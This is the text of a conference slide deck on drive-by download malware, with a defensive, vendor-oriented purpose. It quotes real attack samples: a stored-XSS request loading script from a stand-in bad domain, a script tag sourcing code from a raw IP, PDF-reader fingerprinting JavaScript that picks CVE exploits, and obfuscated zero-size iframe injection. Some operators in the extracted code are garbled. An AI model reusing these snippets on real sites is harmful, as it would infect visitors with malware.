Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Download as PPTX, PDF0 likes252 views
The document discusses the evolution of drive-by downloads, highlighting how threats have expanded from floppy disks and email attachments to mainstream web infections via legitimate sites. It provides an overview of malware distribution methods and the importance of applying secure coding practices and vulnerability assessments to mitigate risks. Furthermore, it emphasizes the necessity of testing web applications regularly to identify and remediate vulnerabilities to ensure web security.
![Step 2: Ex. Fingerprint PDF Readerfunction pdf_start(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');varversion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]DA3)){util_printf();} if((version_array[0]DA8)||(version_array[0]==8&&version_array[1]DA2&&version_array[2]DA2)){collab_email();} if((version_array[0]DA9)||(version_array[0]==9&&version_array[1]DA1)){collab_geticon();}} pdf_start();}](https://image.slidesharecdn.com/rsacenzicdasientpresentationfeb16final-110304191304-phpapp01/85/Drive-By-Downloads-How-To-Avoid-Getting-a-Cap-Popped-in-Your-App-29-320.jpg)
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
- 1. Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Lars Ewe, CenzicNeil Daswani, Dasient Session ID: xxx-xxxxSession Classification: xxxxxxxxxxxx
- 2. Drive-By via XSS on RSA Conf WebsiteDiscovered by Gerry Eisenhaur (Dasient)Persistent XSS in Jive“Benign” drive-by injected / Pops up calc.exeScript element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarksUn-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102Yet again -- use of SSL alone does not provide security – code must be made secure also!
- 3. Check This Out …Watch
- 4. AgendaQuick History of Security Malware Anatomy & DistributionLifecycle of Malware ProtectionFuture of Web Security
- 5. 5Quick History: Security
- 6. Evolution of Security 1980s Anti-Virus1986: Brain Virus (Pakistan) 1990: More viruses – Fish, Flip, Whale. 1991-98: Famous Michelangelo. Symantec introduces Norton1998 – 2004: Internet surge, new viruses = (Melissa, I love you, Nimda, SQL Slammer, Sobig.F, Naachi, Sasser) cause havoc Over 60K known viruses. Frequent updates provided by vendors.1990s Network SecurityLate 90s – With the Explosion of Internet, network firewalls control traffic
- 7. Intrusion Detection Systems (IDS) introduced to monitor anomalous activity
- 8. Intrusion Prevention Systems (IPS) combined IDS & network firewalls
- 9. Network vulnerability scanning tools introduced to aid vulnerability management 2000s Application SecurityLate 90s: Internet growth, companies tighten the perimeter but ignore applications
- 10. Some vulnerability scanning tools & WAFs deployed, but security holes remain – especially for custom apps
- 11. Drive-by-downloads mature from prototype attacks to mainstream
- 12. 2007: SQL Injection used to inject malicious drive-by-download code in addition to data theft
- 13. 2009: Gumblar web worm infects 80K servers, Web malware used in Aurora attack, widget attacks
- 14. 2010: Over 1M web sites infected in 1 quarter, large Gov websites hit (NIH, US Treasury, EPA)Fundamental Change in Malware DistributionInfect clientsInfect servers to infect clientsLate 80s to 90sLate 90s to mid-2000sMid-2000s to presentDistribution methodsFloppy Disks,WormsEmail attachments, file downloadsDrive-by-downloads (at legitimate sites)Active content on web pagesExecutable code in static fileForm of malwarePC, OS, client-side appsWeb applicationsand serversWhat’s exploitedWebsites suffer brand, revenue, and customer losses when infected
- 15. 8Malware Anatomy & Distribution
- 16. Step 1: Infect a Site (or 2 or 3 or Thousands!)There is no perimeterWeb 2.0/ external contentSoftware vulnerabilitiesAds (Malvertising) Mash-ups Widgets External images User generated content (HTML, images, links, exe, documents)SQL Injection
- 17. XSS
- 18. PHP file include
- 19. Un-patched Software (blog, CMS, shopping cart)Infrastructure vulnerabilitiesPasswords compromisedVulnerable hosting platform
- 21. FTP credentials
- 22. SSH credentials
- 23. Web server credentialsStep 1. Infect via Stored XSSHttp request to inject script:Server’s response contains:http://www.mywwwservice.com/update_profile?Favorite_food=cookies+%3Cscript src=baddomain.com%3E%3C/script%3E<p>Your favorite food is 'cookies <script src=baddomain.com></script>' returned the following results:</p>
- 24. Step 1: Inject Really Malicious JavaScript
- 25. Step 1: Inject Really Malicious JavaScript
- 26. Step 1: Inject Really Malicious JavaScriptSources in malicious JavaScript from a compromised IP!Infects user's machine silently<script id=_0_ src=//218.93.202.61/cp/></script>
- 27. Step 2: Invoke Client-Side VulnerabilityCVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.
- 28. Step 2: Ex. Fingerprint PDF ReaderJavaScript generates a zero-size IFRAME in web page sources in a PDF file PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different than JavaScript interpreter used by browser)Attacker needs to determine which version of the PDF reader / JavaScript interpreter to target
- 29. Step 2: Ex. Fingerprint PDF Readerfunction pdf_start(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');varversion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]DA3)){util_printf();} if((version_array[0]DA8)||(version_array[0]==8&&version_array[1]DA2&&version_array[2]DA2)){collab_email();} if((version_array[0]DA9)||(version_array[0]==9&&version_array[1]DA1)){collab_geticon();}} pdf_start();}
- 30. Step 3: Deliver ShellcodeDepending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode“Spray” the heap with assembly instructions that give shell accessCall a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())
- 31. Step 4: Send ‘Downloader’Example: 2k8.exe
- 32. Step 5: Join a Botnet: e.g. Zeus
- 33. Zeus Botnet + Targeted PhishingBotnet propagation + Targeted Phishing:http://internetbanking.gad.de/banking/http://hsbc.co.ukhttp://www.mybank.alliance-leicester.co.ukhttp://www.citibank.de
- 34. What Next?Steal credentials (e.g., Zeus)Sell fake anti-virus (e.g., Koobface)Steal FTP credentials (e.g., Gumblar)Steal corporate secrets (e.g., Aurora)Collect fraudulent click revenue (e.g., ClickbotA)
- 35. Evolution: Multi-DOM Node Injection<div id=f37z>*!@g$a+\*t*e##4a+@d^s!.i!n$f+o@@</div><script>document.write('<iframe src=\''+unescape(document.getElementById('f37z').innerHTML.replace(/[\+!*^#@$]/g,""))+'\' width=0 height=0></iframe>');
- 36. Evolution: Multi-DOM Node Injection<div id=f37z>*!@g$a+\*t*e##4a+@d^s!.i!n$f+o@@</div><iframesrc=gate4ads.info width=0 height=0></iframe><script>document.write('<iframe src=\''+unescape(document.getElementById('f37z').innerHTML.replace(/[\+!*^#@$]/g,""))+'\' width=0 height=0></iframe>');
- 38. Infection Library: Example Entry
- 39. 26Lifecycle of Malware Protection
- 40. Defense-In-Depth:Lifecycle of Malware ProtectionAssessVulnerability & Malware Risk AssessmentSecurity Design Review, Secure Coding Practices, Fix Bugs, WAF, Code ReviewsPreventDetectWeb Anti-Malware (WAM) MonitoringContainmod_antimalwareRecoverRemove malcode
- 41. 28Future of Web Security
- 42. Risk ToleranceMission Critical SecurityOn-premise softwareImportant SecurityManaged ServiceIntegrated Web Scanning / Malware Cloud Solution (Cenzic / Dasient)Broad offering
- 43. High volume
- 45. Manage Website Risk: Fast & EasyTestAllApps For HealthCheckLowRISKSCOREStrong Testing for Important AppsRobust Testing for Critical AppsHigh
- 46. Takeaways: What You Should Do Within 3 MonthsTest ALL your web applications via a HealthCheck Test for both application vulnerabilities and malwarePrioritize your vulnerabilities based on risk scoreBlock until you remediateGet Feb 2011 Ponemon research report on the state of web application security
- 47. Integrated HealthCheck Offer & Learn MoreGet a Free, Integrated Website HealthCheck!Get a listing of all website vulnerabilities in an easy to read report!Just email: appmal@cenzic.comFor more information on Web vulnerability scanning and malware, visit us!
- 48. Cenzic
- 49. www.cenzic.com / http://blog.cenzic.com
- 50. Dasient
- 52. 34Thank You!Lars Ewe, CenzicNeil Daswani, Dasient
Editor's Notes
- #10: Use web application vulnerability (stored XSS) to inject legitimate web page with malicious code (e.g., JavaScript, IFRAME, etc)Invoke client-side vulnerability (e.g., IE zero-day, PDF exploit, etc) OR use social engineeringDeliver shellcode to take controlSend “downloader”Deliver malware of attackers choice